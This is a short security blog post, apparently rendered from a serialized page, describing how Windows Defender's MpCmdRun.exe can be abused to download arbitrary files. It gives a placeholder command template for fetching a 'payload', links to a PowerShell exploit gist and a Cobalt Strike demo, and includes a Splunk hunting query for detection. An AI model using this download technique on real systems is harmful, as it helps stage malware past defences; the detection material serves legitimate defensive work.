I"l<p>Recently I found interesting post in twitter, one of the security researcher(Askar) is identified, Microsoft Defender feature it can able to download any files from Internet.</p>

<p>Microsoft Defender is having one of the executable(MpCmdRun.exe) which is used as Malware protection command line utility. This executable having a feature which can take any URL as an input and download files in specific Windows Defender system files path.</p>

<h5 id="windows-defender-file-path">Windows Defender File Path:</h5>
<div class="language-batch highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">C</span>:\ProgramData\Microsoft\Windows <span class="kd">Defender</span>\Platform\4.18.2007.8<span class="o">-</span><span class="m">0</span>\MpCmdRun.exe
</code></pre></div></div>
<h4 id="more-info-about-mpcmdrunexe-binary">More Info about MpCmdRun.exe binary:</h4>
<p><a href="https://strontic.github.io/xcyclopedia/library/MpCmdRun.exe-73E18D56F42B16160008629E1C936311.html">Detailed Info - MpCmdRun.exe</a></p>

<h4 id="windows-defender-command-line---mpcmdrunexe-download-any-payload">Windows Defender Command Line - MpCmdRun.exe (Download any payload)</h4>
<div class="language-batch highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">C</span>:\ProgramData\Microsoft\Windows <span class="kd">Defender</span>\platform\4.18.2008.9<span class="o">-</span><span class="m">0</span>\MpCmdRun.exe <span class="na">-url </span><span class="o">&lt;</span><span class="kd">url</span><span class="o">&gt;</span> <span class="na">-path </span><span class="o">&lt;</span><span class="kd">local</span><span class="na">-path</span><span class="o">&gt;</span>
</code></pre></div></div>
<h4 id="quick--dirty---powershell-script---exploit-code">Quick &amp; Dirty - Powershell Script - Exploit Code:</h4>
<p><a href="https://gist.github.com/klezVirus/977f6cd9e4126103326f6a28700382d1">Abuse Windows Defender - MpCmdRun.exe - Powershell code</a></p>

<h4 id="demo-by-using-cobaltstrike">Demo by using CobaltStrike:</h4>
<figure>
<img src="/windowsdefender-official-backdoor-download-files-from-internet-mpcmdrun/cbstrike.jpeg" alt="Demo - CobaltStrike" />
<figcaption>Demo - CobaltStrike</figcaption>
</figure>

<h4 id="blueteam---threat-hunting--quick--dirty-detection">BlueTeam - Threat Hunting / Quick &amp; Dirty Detection:</h4>
<div class="language-batch highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">Commandhistoryv2</span> _raw<span class="o">=</span><span class="s2">"*Download*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*URL*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*url*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*download*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*http://*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*https://*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*HTTP://*"</span> <span class="kd">OR</span> _raw<span class="o">=</span><span class="s2">"*HTTPS://*"</span>
<span class="o">|</span> <span class="kd">dedup</span> <span class="kd">CommandHistory</span>
<span class="o">|</span> <span class="kd">table</span> <span class="kd">ComputerName</span> <span class="kd">ApplicationName</span> <span class="kd">CommandHistory</span> <span class="kd">FileName</span>
</code></pre></div></div>
<h4 id="blueteam---splunk-detection">BlueTeam - Splunk Detection:</h4>
<figure>
<img src="/windowsdefender-official-backdoor-download-files-from-internet-mpcmdrun/splunk.png" alt="Splunk hunting" />
<figcaption>Splunk - Hunting</figcaption>
</figure>

<h4 id="references">References</h4>
<ul>
  <li><a href="https://twitter.com/mohammadaskar2/status/1301263551638761477">Twitter Post</a></li>
</ul>
:ET